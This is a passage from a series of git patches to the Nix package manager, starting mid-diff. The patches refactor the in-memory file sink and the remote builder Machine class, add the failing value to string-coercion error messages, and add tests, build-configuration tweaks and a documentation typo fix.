std::get_if(&f->raw))) + if (auto * rp = std::get_if(&f->raw)) { + CreateMemoryRegularFile crf { *rp }; + func(crf); + } else throw Error("file '%s' is not a regular file", path); } -void MemorySink::closeRegularFile() +void CreateMemoryRegularFile::isExecutable() { - r = nullptr; + regularFile.executable = true; } -void MemorySink::isExecutable() +void CreateMemoryRegularFile::preallocateContents(uint64_t len) { - assert(r); - r->executable = true; + regularFile.contents.reserve(len); } -void MemorySink::preallocateContents(uint64_t len) +void CreateMemoryRegularFile::operator () (std::string_view data) { - assert(r); - r->contents.reserve(len); -} - -void MemorySink::receiveContents(std::string_view data) -{ - assert(r); - r->contents += data; + regularFile.contents += data; } void MemorySink::createSymlink(const Path & path, const std::string & target) diff --git a/src/libutil/memory-source-accessor.hh b/src/libutil/memory-source-accessor.hh index b46c61e54..7a1990d2f 100644 --- a/src/libutil/memory-source-accessor.hh +++ b/src/libutil/memory-source-accessor.hh @@ -83,17 +83,11 @@ struct MemorySink : FileSystemObjectSink void createDirectory(const Path & path) override; - void createRegularFile(const Path & path) override; - void receiveContents(std::string_view data) override; - void isExecutable() override; - void closeRegularFile() override; + void createRegularFile( + const Path & path, + std::function) override; void createSymlink(const Path & path, const std::string & target) override; - - void preallocateContents(uint64_t size) override; - -private: - MemorySourceAccessor::File::Regular * r; }; } diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc index 6bbcd161b..76ef86bcf 100644 --- a/tests/unit/libutil/git.cc +++ b/tests/unit/libutil/git.cc @@ -66,7 +66,8 @@ TEST_F(GitTest, blob_read) { StringSource in { encoded }; StringSink out; RegularFileSink out2 { out }; - parse(out2, "", in, [](auto &, auto) {}, mockXpSettings); + 
ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Blob); + parseBlob(out2, "", in, false, mockXpSettings); auto expected = readFile(goldenMaster("hello-world.bin")); @@ -121,7 +122,8 @@ TEST_F(GitTest, tree_read) { StringSource in { encoded }; NullFileSystemObjectSink out; Tree got; - parse(out, "", in, [&](auto & name, auto entry) { + ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Tree); + parseTree(out, "", in, [&](auto & name, auto entry) { auto name2 = name; if (entry.mode == Mode::Directory) name2 += '/'; @@ -193,15 +195,21 @@ TEST_F(GitTest, both_roundrip) { MemorySink sinkFiles2 { files2 }; - std::function mkSinkHook; - mkSinkHook = [&](const Path prefix, const Hash & hash) { + std::function mkSinkHook; + mkSinkHook = [&](auto prefix, auto & hash, auto executable) { StringSource in { cas[hash] }; - parse(sinkFiles2, prefix, in, [&](const Path & name, const auto & entry) { - mkSinkHook(prefix + "/" + name, entry.hash); - }, mockXpSettings); + parse( + sinkFiles2, prefix, in, executable, + [&](const Path & name, const auto & entry) { + mkSinkHook( + prefix + "/" + name, + entry.hash, + entry.mode == Mode::Executable); + }, + mockXpSettings); }; - mkSinkHook("", root.hash); + mkSinkHook("", root.hash, false); ASSERT_EQ(files, files2); } From 739032762addcb3d88490040b388ff63b155bb16 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 23 Jan 2024 12:30:26 -0500 Subject: [PATCH 338/654] Make `Machine::systemTypes` a set not vector This is more conceptually correct (the order does not matter), and also matches what Hydra already does. 
(Nix and Hydra matching is needed for dedup https://github.com/NixOS/hydra/issues/1164) --- src/build-remote/build-remote.cc | 6 ++---- src/libstore/machines.cc | 2 +- src/libstore/machines.hh | 2 +- 3 files changed, 4 insertions(+), 6 deletions(-) diff --git a/src/build-remote/build-remote.cc b/src/build-remote/build-remote.cc index d69d3a0c2..b6704152a 100644 --- a/src/build-remote/build-remote.cc +++ b/src/build-remote/build-remote.cc @@ -139,9 +139,7 @@ static int main_build_remote(int argc, char * * argv) if (m.enabled && (neededSystem == "builtin" - || std::find(m.systemTypes.begin(), - m.systemTypes.end(), - neededSystem) != m.systemTypes.end()) && + || m.systemTypes.count(neededSystem) > 0) && m.allSupported(requiredFeatures) && m.mandatoryMet(requiredFeatures)) { @@ -214,7 +212,7 @@ static int main_build_remote(int argc, char * * argv) for (auto & m : machines) error - % concatStringsSep>(", ", m.systemTypes) + % concatStringsSep(", ", m.systemTypes) % m.maxJobs % concatStringsSep(", ", m.supportedFeatures) % concatStringsSep(", ", m.mandatoryFeatures); diff --git a/src/libstore/machines.cc b/src/libstore/machines.cc index 512115893..8a1da84cd 100644 --- a/src/libstore/machines.cc +++ b/src/libstore/machines.cc @@ -145,7 +145,7 @@ static Machine parseBuilderLine(const std::string & line) return { tokens[0], - isSet(1) ? tokenizeString>(tokens[1], ",") : std::vector{settings.thisSystem}, + isSet(1) ? tokenizeString>(tokens[1], ",") : std::set{settings.thisSystem}, isSet(2) ? tokens[2] : "", isSet(3) ? parseUnsignedIntField(3) : 1U, isSet(4) ? 
parseUnsignedIntField(4) : 1U, diff --git a/src/libstore/machines.hh b/src/libstore/machines.hh index 1adeaf1f0..d25fdf1b3 100644 --- a/src/libstore/machines.hh +++ b/src/libstore/machines.hh @@ -10,7 +10,7 @@ class Store; struct Machine { const std::string storeUri; - const std::vector systemTypes; + const std::set systemTypes; const std::string sshKey; const unsigned int maxJobs; const unsigned int speedFactor; From 870acc2892661d1d2c9f9f39c43d79cb4bbaacb0 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 23 Jan 2024 12:50:48 -0500 Subject: [PATCH 339/654] Add API docs to `Machine` methods --- src/libstore/machines.hh | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/libstore/machines.hh b/src/libstore/machines.hh index d25fdf1b3..7dd812cf0 100644 --- a/src/libstore/machines.hh +++ b/src/libstore/machines.hh @@ -19,8 +19,15 @@ struct Machine { const std::string sshPublicHostKey; bool enabled = true; + /** + * @return Whether `features` is a subset of the union of `supportedFeatures` and + * `mandatoryFeatures` + */ bool allSupported(const std::set & features) const; + /** + * @return Whether `mandatoryFeatures` is a subset of `features` + */ bool mandatoryMet(const std::set & features) const; Machine(decltype(storeUri) storeUri, From 0aa85088dee30615adcc7a2933fb94ea8767ec35 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 23 Jan 2024 12:52:54 -0500 Subject: [PATCH 340/654] Factor out `Machine::systemSupported` There's just enough logic (the `"builtin"` special case) that makes this worthy of its own method. 
--- src/build-remote/build-remote.cc | 5 ++--- src/libstore/machines.cc | 5 +++++ src/libstore/machines.hh | 6 ++++++ 3 files changed, 13 insertions(+), 3 deletions(-) diff --git a/src/build-remote/build-remote.cc b/src/build-remote/build-remote.cc index b6704152a..519e03242 100644 --- a/src/build-remote/build-remote.cc +++ b/src/build-remote/build-remote.cc @@ -137,9 +137,8 @@ static int main_build_remote(int argc, char * * argv) for (auto & m : machines) { debug("considering building on remote machine '%s'", m.storeUri); - if (m.enabled - && (neededSystem == "builtin" - || m.systemTypes.count(neededSystem) > 0) && + if (m.enabled && + m.systemSupported(neededSystem) && m.allSupported(requiredFeatures) && m.mandatoryMet(requiredFeatures)) { diff --git a/src/libstore/machines.cc b/src/libstore/machines.cc index 8a1da84cd..561d8d557 100644 --- a/src/libstore/machines.cc +++ b/src/libstore/machines.cc @@ -38,6 +38,11 @@ Machine::Machine(decltype(storeUri) storeUri, sshPublicHostKey(sshPublicHostKey) {} +bool Machine::systemSupported(const std::string & system) const +{ + return system == "builtin" || (systemTypes.count(system) > 0); +} + bool Machine::allSupported(const std::set & features) const { return std::all_of(features.begin(), features.end(), diff --git a/src/libstore/machines.hh b/src/libstore/machines.hh index 7dd812cf0..1bca74c28 100644 --- a/src/libstore/machines.hh +++ b/src/libstore/machines.hh @@ -19,6 +19,12 @@ struct Machine { const std::string sshPublicHostKey; bool enabled = true; + /** + * @return Whether `system` is either `"builtin"` or in + * `systemTypes`. 
+ */ + bool systemSupported(const std::string & system) const; + /** * @return Whether `features` is a subset of the union of `supportedFeatures` and * `mandatoryFeatures` From 83bb494a30a9e659a53eb757242fa0113aeae556 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Wed, 6 Dec 2023 12:42:53 -0800 Subject: [PATCH 341/654] Print the value in `error: cannot coerce` messages This extends the `error: cannot coerce a TYPE to a string` message to print the value that could not be coerced. This helps with debugging by making it easier to track down where the value is being produced from, especially in errors with deep or unhelpful stack traces. --- .../rl-next/print-value-in-coercion-error.md | 24 ++++++++++++++++ .../src/language/string-interpolation.md | 2 +- src/libexpr/eval.cc | 10 +++++-- src/libexpr/print-options.hh | 8 +++++- src/libexpr/print.cc | 11 +++++--- ...al-fail-bad-string-interpolation-1.err.exp | 2 +- ...al-fail-bad-string-interpolation-3.err.exp | 2 +- ...al-fail-bad-string-interpolation-4.err.exp | 2 +- tests/unit/libexpr/error_traces.cc | 28 +++++++++---------- tests/unit/libexpr/value/print.cc | 10 +++---- 10 files changed, 68 insertions(+), 31 deletions(-) create mode 100644 doc/manual/rl-next/print-value-in-coercion-error.md diff --git a/doc/manual/rl-next/print-value-in-coercion-error.md b/doc/manual/rl-next/print-value-in-coercion-error.md new file mode 100644 index 000000000..046e4e3cf --- /dev/null +++ b/doc/manual/rl-next/print-value-in-coercion-error.md @@ -0,0 +1,24 @@ +--- +synopsis: Coercion errors include the failing value +issues: #561 +prs: #9754 +--- + +The `error: cannot coerce a to a string` message now includes the value +which caused the error. 
+ +Before: + +``` + error: cannot coerce a set to a string +``` + +After: + +``` + error: cannot coerce a set to a string: { aesSupport = «thunk»; + avx2Support = «thunk»; avx512Support = «thunk»; avxSupport = «thunk»; + canExecute = «thunk»; config = «thunk»; darwinArch = «thunk»; darwinMinVersion + = «thunk»; darwinMinVersionVariable = «thunk»; darwinPlatform = «thunk»; «84 + attributes elided»} +``` diff --git a/doc/manual/src/language/string-interpolation.md b/doc/manual/src/language/string-interpolation.md index e999b287b..6e28d2664 100644 --- a/doc/manual/src/language/string-interpolation.md +++ b/doc/manual/src/language/string-interpolation.md @@ -189,7 +189,7 @@ If neither is present, an error is thrown. > "${a}" > ``` > -> error: cannot coerce a set to a string +> error: cannot coerce a set to a string: { } > > at «string»:4:2: > diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 71e956e10..437a6b7bf 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2255,7 +2255,9 @@ BackedStringView EvalState::coerceToString( return std::move(*maybeString); auto i = v.attrs->find(sOutPath); if (i == v.attrs->end()) { - error("cannot coerce %1% to a string", showType(v)) + error("cannot coerce %1% to a string: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2301,7 +2303,9 @@ BackedStringView EvalState::coerceToString( } } - error("cannot coerce %1% to a string", showType(v)) + error("cannot coerce %1% to a string: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) .withTrace(pos, errorCtx) .debugThrow(); } @@ -2661,7 +2665,7 @@ void EvalState::printStatistics() std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { throw TypeError({ - .msg = hintfmt("cannot coerce %1% to a string", showType()) + .msg = hintfmt("cannot coerce %1% to a string: %2%", showType(), *this) }); } diff --git 
a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh index aba2eaeae..e03746ece 100644 --- a/src/libexpr/print-options.hh +++ b/src/libexpr/print-options.hh @@ -36,11 +36,17 @@ struct PrintOptions */ size_t maxDepth = std::numeric_limits::max(); /** - * Maximum number of attributes in an attribute set to print. + * Maximum number of attributes in attribute sets to print. + * + * Note that this is a limit for the entire print invocation, not for each + * attribute set encountered. */ size_t maxAttrs = std::numeric_limits::max(); /** * Maximum number of list items to print. + * + * Note that this is a limit for the entire print invocation, not for each + * list encountered. */ size_t maxListItems = std::numeric_limits::max(); /** diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index dad6dc9ad..702e4bfe8 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -20,7 +20,7 @@ void printElided( { if (ansiColors) output << ANSI_FAINT; - output << " «"; + output << "«"; pluralize(output, value, single, plural); output << " elided»"; if (ansiColors) @@ -37,7 +37,7 @@ printLiteralString(std::ostream & str, const std::string_view string, size_t max str << "\""; for (auto i = string.begin(); i != string.end(); ++i) { if (charsPrinted >= maxLength) { - str << "\""; + str << "\" "; printElided(str, string.length() - charsPrinted, "byte", "bytes", ansiColors); return str; } @@ -161,6 +161,8 @@ private: EvalState & state; PrintOptions options; std::optional seen; + size_t attrsPrinted = 0; + size_t listItemsPrinted = 0; void printRepeated() { @@ -279,7 +281,6 @@ private: else std::sort(sorted.begin(), sorted.end(), ImportantFirstAttrNameCmp()); - size_t attrsPrinted = 0; for (auto & i : sorted) { if (attrsPrinted >= options.maxAttrs) { printElided(sorted.size() - attrsPrinted, "attribute", "attributes"); @@ -307,7 +308,6 @@ private: output << "[ "; if (depth < options.maxDepth) { - size_t listItemsPrinted = 0; for (auto elem : v.listItems()) { if 
(listItemsPrinted >= options.maxListItems) { printElided(v.listSize() - listItemsPrinted, "item", "items"); @@ -486,6 +486,9 @@ public: void print(Value & v) { + attrsPrinted = 0; + listItemsPrinted = 0; + if (options.trackRepeated) { seen.emplace(); } else { diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp index b461b2e02..5ae53034d 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-1.err.exp @@ -5,4 +5,4 @@ error: | ^ 2| - error: cannot coerce a function to a string + error: cannot coerce a function to a string: «lambda @ /pwd/lang/eval-fail-bad-string-interpolation-1.nix:1:4» diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp index 95f4c2460..170a3d132 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-3.err.exp @@ -5,4 +5,4 @@ error: | ^ 2| - error: cannot coerce a function to a string + error: cannot coerce a function to a string: «lambda @ /pwd/lang/eval-fail-bad-string-interpolation-3.nix:1:5» diff --git a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp index 4950f8ddb..5119238d7 100644 --- a/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp +++ b/tests/functional/lang/eval-fail-bad-string-interpolation-4.err.exp @@ -6,4 +6,4 @@ error: | ^ 10| - error: cannot coerce a set to a string + error: cannot coerce a set to a string: { a = { a = { a = { a = "ha"; b = "ha"; c = "ha"; d = "ha"; e = "ha"; f = "ha"; g = "ha"; h = "ha"; j = "ha"; }; «4294967295 attributes elided»}; «4294967294 attributes elided»}; «4294967293 attributes elided»} diff --git a/tests/unit/libexpr/error_traces.cc 
b/tests/unit/libexpr/error_traces.cc index f0cad58bb..b6fbf02fe 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -295,7 +295,7 @@ namespace nix { TEST_F(ErrorTraceTest, toPath) { ASSERT_TRACE2("toPath []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.toPath")); ASSERT_TRACE2("toPath \"foo\"", @@ -309,7 +309,7 @@ namespace nix { TEST_F(ErrorTraceTest, storePath) { ASSERT_TRACE2("storePath true", TypeError, - hintfmt("cannot coerce %s to a string", "a Boolean"), + hintfmt("cannot coerce %s to a string: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to 'builtins.storePath'")); } @@ -318,7 +318,7 @@ namespace nix { TEST_F(ErrorTraceTest, pathExists) { ASSERT_TRACE2("pathExists []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while realising the context of a path")); ASSERT_TRACE2("pathExists \"zorglub\"", @@ -332,7 +332,7 @@ namespace nix { TEST_F(ErrorTraceTest, baseNameOf) { ASSERT_TRACE2("baseNameOf []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.baseNameOf")); } @@ -377,7 +377,7 @@ namespace nix { TEST_F(ErrorTraceTest, filterSource) { ASSERT_TRACE2("filterSource [] []", TypeError, - hintfmt("cannot coerce %s to a string", "a list"), + hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] \"foo\"", @@ -1038,7 +1038,7 @@ namespace nix { TEST_F(ErrorTraceTest, toString) { ASSERT_TRACE2("toString { a = 1; }", TypeError, - hintfmt("cannot coerce %s to 
a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ a = " ANSI_CYAN "1" ANSI_NORMAL "; }"), hintfmt("while evaluating the first argument passed to builtins.toString")); } @@ -1057,7 +1057,7 @@ namespace nix { ASSERT_TRACE2("substring 0 3 {}", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the third argument (the string) passed to builtins.substring")); ASSERT_TRACE1("substring (-3) 3 \"sometext\"", @@ -1070,7 +1070,7 @@ namespace nix { TEST_F(ErrorTraceTest, stringLength) { ASSERT_TRACE2("stringLength {} # TODO: context is missing ???", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the argument passed to builtins.stringLength")); } @@ -1143,7 +1143,7 @@ namespace nix { ASSERT_TRACE2("concatStringsSep \"foo\" [ 1 2 {} ] # TODO: coerce to string is buggy", TypeError, - hintfmt("cannot coerce %s to a string", "an integer"), + hintfmt("cannot coerce %s to a string: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating one element of the list of strings to concat passed to builtins.concatStringsSep")); } @@ -1229,12 +1229,12 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'system' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"drv\"; }", @@ -1279,17 
+1279,17 @@ namespace nix { ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ \"a\" {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; FOO = {}; }", TypeError, - hintfmt("cannot coerce %s to a string", "a set"), + hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), hintfmt("while evaluating the attribute 'FOO' of derivation 'foo'")); } diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc index 98131112e..c4264a38d 100644 --- a/tests/unit/libexpr/value/print.cc +++ b/tests/unit/libexpr/value/print.cc @@ -370,7 +370,7 @@ TEST_F(ValuePrintingTests, ansiColorsStringElided) v.mkString("puppy"); test(v, - ANSI_MAGENTA "\"pup\"" ANSI_FAINT " «2 bytes elided»" ANSI_NORMAL, + ANSI_MAGENTA "\"pup\" " ANSI_FAINT "«2 bytes elided»" ANSI_NORMAL, PrintOptions { .ansiColors = true, .maxStringLength = 3 @@ -756,7 +756,7 @@ TEST_F(ValuePrintingTests, ansiColorsAttrsElided) vAttrs.mkAttrs(builder.finish()); test(vAttrs, - "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT " «1 attribute elided»" ANSI_NORMAL "}", + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«1 attribute elided»" ANSI_NORMAL "}", PrintOptions { .ansiColors = true, .maxAttrs = 1 @@ -769,7 +769,7 @@ TEST_F(ValuePrintingTests, ansiColorsAttrsElided) vAttrs.mkAttrs(builder.finish()); test(vAttrs, - "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT " «2 attributes elided»" ANSI_NORMAL 
"}", + "{ one = " ANSI_CYAN "1" ANSI_NORMAL "; " ANSI_FAINT "«2 attributes elided»" ANSI_NORMAL "}", PrintOptions { .ansiColors = true, .maxAttrs = 1 @@ -793,7 +793,7 @@ TEST_F(ValuePrintingTests, ansiColorsListElided) vList.bigList.size = 2; test(vList, - "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT " «1 item elided»" ANSI_NORMAL "]", + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«1 item elided»" ANSI_NORMAL "]", PrintOptions { .ansiColors = true, .maxListItems = 1 @@ -806,7 +806,7 @@ TEST_F(ValuePrintingTests, ansiColorsListElided) vList.bigList.size = 3; test(vList, - "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT " «2 items elided»" ANSI_NORMAL "]", + "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«2 items elided»" ANSI_NORMAL "]", PrintOptions { .ansiColors = true, .maxListItems = 1 From 1e24db6f9a7a36ddba1a591da8ddf5f5c9ec3f83 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 24 Jan 2024 01:03:07 -0500 Subject: [PATCH 342/654] Convert `Machine::speedFactor` from a non-neg int to a non-neg float The short motivation is to match Hydra, so we can de-dup. The long version is laid out in https://github.com/NixOS/nix/issues/9840. --- src/libstore/machines.cc | 17 ++++++++++++++--- src/libstore/machines.hh | 2 +- tests/unit/libstore/machines.cc | 3 ++- 3 files changed, 17 insertions(+), 5 deletions(-) diff --git a/src/libstore/machines.cc b/src/libstore/machines.cc index 561d8d557..2d461c63a 100644 --- a/src/libstore/machines.cc +++ b/src/libstore/machines.cc @@ -32,11 +32,14 @@ Machine::Machine(decltype(storeUri) storeUri, systemTypes(systemTypes), sshKey(sshKey), maxJobs(maxJobs), - speedFactor(std::max(1U, speedFactor)), + speedFactor(speedFactor == 0.0f ? 
1.0f : std::move(speedFactor)), supportedFeatures(supportedFeatures), mandatoryFeatures(mandatoryFeatures), sshPublicHostKey(sshPublicHostKey) -{} +{ + if (speedFactor < 0.0) + throw UsageError("speed factor must be >= 0"); +} bool Machine::systemSupported(const std::string & system) const { @@ -135,6 +138,14 @@ static Machine parseBuilderLine(const std::string & line) return result.value(); }; + auto parseFloatField = [&](size_t fieldIndex) { + const auto result = string2Int(tokens[fieldIndex]); + if (!result) { + throw FormatError("bad machine specification: failed to convert column #%lu in a row: '%s' to 'float'", fieldIndex, line); + } + return result.value(); + }; + auto ensureBase64 = [&](size_t fieldIndex) { const auto & str = tokens[fieldIndex]; try { @@ -153,7 +164,7 @@ static Machine parseBuilderLine(const std::string & line) isSet(1) ? tokenizeString>(tokens[1], ",") : std::set{settings.thisSystem}, isSet(2) ? tokens[2] : "", isSet(3) ? parseUnsignedIntField(3) : 1U, - isSet(4) ? parseUnsignedIntField(4) : 1U, + isSet(4) ? parseFloatField(4) : 1.0f, isSet(5) ? tokenizeString>(tokens[5], ",") : std::set{}, isSet(6) ? tokenizeString>(tokens[6], ",") : std::set{}, isSet(7) ? 
ensureBase64(7) : "" diff --git a/src/libstore/machines.hh b/src/libstore/machines.hh index 1bca74c28..8516409d4 100644 --- a/src/libstore/machines.hh +++ b/src/libstore/machines.hh @@ -13,7 +13,7 @@ struct Machine { const std::set systemTypes; const std::string sshKey; const unsigned int maxJobs; - const unsigned int speedFactor; + const float speedFactor; const std::set supportedFeatures; const std::set mandatoryFeatures; const std::string sshPublicHostKey; diff --git a/tests/unit/libstore/machines.cc b/tests/unit/libstore/machines.cc index 5b66e5a5b..9fd7fda54 100644 --- a/tests/unit/libstore/machines.cc +++ b/tests/unit/libstore/machines.cc @@ -14,6 +14,7 @@ using testing::SizeIs; using nix::absPath; using nix::FormatError; +using nix::UsageError; using nix::getMachines; using nix::Machine; using nix::Machines; @@ -133,7 +134,7 @@ TEST(machines, getMachinesWithIncorrectFormat) { settings.builders = "nix@scratchy.labs.cs.uu.nl - - 8 three"; EXPECT_THROW(getMachines(), FormatError); settings.builders = "nix@scratchy.labs.cs.uu.nl - - 8 -3"; - EXPECT_THROW(getMachines(), FormatError); + EXPECT_THROW(getMachines(), UsageError); settings.builders = "nix@scratchy.labs.cs.uu.nl - - 8 3 - - BAD_BASE64"; EXPECT_THROW(getMachines(), FormatError); } From 6532dd50fc4f2de79f6a187145a3d554b5a6f03a Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 24 Jan 2024 13:19:02 +0100 Subject: [PATCH 343/654] tests/functional/fetchGit.sh: Test fetchGit/fetchTree error message Follow-up for https://github.com/NixOS/nix/pull/9626 176dcd5c617367dbff6d5455856a25518326f79d --- tests/functional/fetchGit.sh | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh index 46532c025..c6a482035 100644 --- a/tests/functional/fetchGit.sh +++ b/tests/functional/fetchGit.sh @@ -66,6 +66,9 @@ path2=$(nix eval --raw --expr "(builtins.fetchGit { url = file://$repo; rev = \" # In pure eval mode, fetchGit with a revision should succeed. 
[[ $(nix eval --raw --expr "builtins.readFile (fetchGit { url = file://$repo; rev = \"$rev2\"; } + \"/hello\")") = world ]] +# But without a hash, it fails +expectStderr 1 nix eval --expr 'builtins.fetchGit "file:///foo"' | grepQuiet "'fetchGit' requires a locked input" + # Fetch again. This should be cached. mv $repo ${repo}-tmp path2=$(nix eval --impure --raw --expr "(builtins.fetchGit file://$repo).outPath") @@ -205,6 +208,8 @@ path6=$(nix eval --impure --raw --expr "(builtins.fetchTree { type = \"git\"; ur [[ $path3 = $path6 ]] [[ $(nix eval --impure --expr "(builtins.fetchTree { type = \"git\"; url = \"file://$TEST_ROOT/shallow\"; ref = \"dev\"; shallow = true; }).revCount or 123") == 123 ]] +expectStderr 1 nix eval --expr 'builtins.fetchTree { type = "git"; url = "file:///foo"; }' | grepQuiet "'fetchTree' requires a locked input" + # Explicit ref = "HEAD" should work, and produce the same outPath as without ref path7=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = \"file://$repo\"; ref = \"HEAD\"; }).outPath") path8=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = \"file://$repo\"; }).outPath") From c81730541133d271c040df92600333cf188dc5a4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 23 Jan 2024 15:37:15 -0500 Subject: [PATCH 344/654] Link both gmock and gtest, not just gtest GMock is not entirely header-only, we're finding. --- configure.ac | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac index f46cff732..8c29c1e62 100644 --- a/configure.ac +++ b/configure.ac @@ -351,7 +351,7 @@ fi AS_IF([test "$ENABLE_UNIT_TESTS" == "yes"],[ # Look for gtest. -PKG_CHECK_MODULES([GTEST], [gtest_main]) +PKG_CHECK_MODULES([GTEST], [gtest_main gmock_main]) # Look for rapidcheck. 
PKG_CHECK_MODULES([RAPIDCHECK], [rapidcheck rapidcheck_gtest]) From a9e10a1dbdbc673614c1f27e889a7a0f7e470462 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 24 Jan 2024 21:32:29 -0500 Subject: [PATCH 345/654] Make `StoreConfig::getDefaultSystemFeatures` a static method This makes something in Hydra bit simpler. If someday the default depends on the other config options, we can always change it back. --- src/libstore/store-api.hh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 876ebf384..5163070b2 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -108,7 +108,7 @@ struct StoreConfig : public StoreDirConfig StoreConfig() = delete; - StringSet getDefaultSystemFeatures(); + static StringSet getDefaultSystemFeatures(); virtual ~StoreConfig() { } From 08f38a3a4030e765f63e6b02e0094d33083c401b Mon Sep 17 00:00:00 2001 From: lexi Date: Thu, 25 Jan 2024 15:30:51 +0100 Subject: [PATCH 346/654] Fix typo in primops.cc (and therefore Nix docs) This also fixes the typo in the Nix docs at https://nixos.org/manual/nix/unstable/language/builtins. --- src/libexpr/primops.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 5032e95cc..993ecceb2 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -1878,7 +1878,7 @@ static RegisterPrimOp primop_outputOf({ For instance, ```nix builtins.outputOf - (builtins.outputOf myDrv "out) + (builtins.outputOf myDrv "out") "out" ``` will return a placeholder for the output of the output of `myDrv`. 
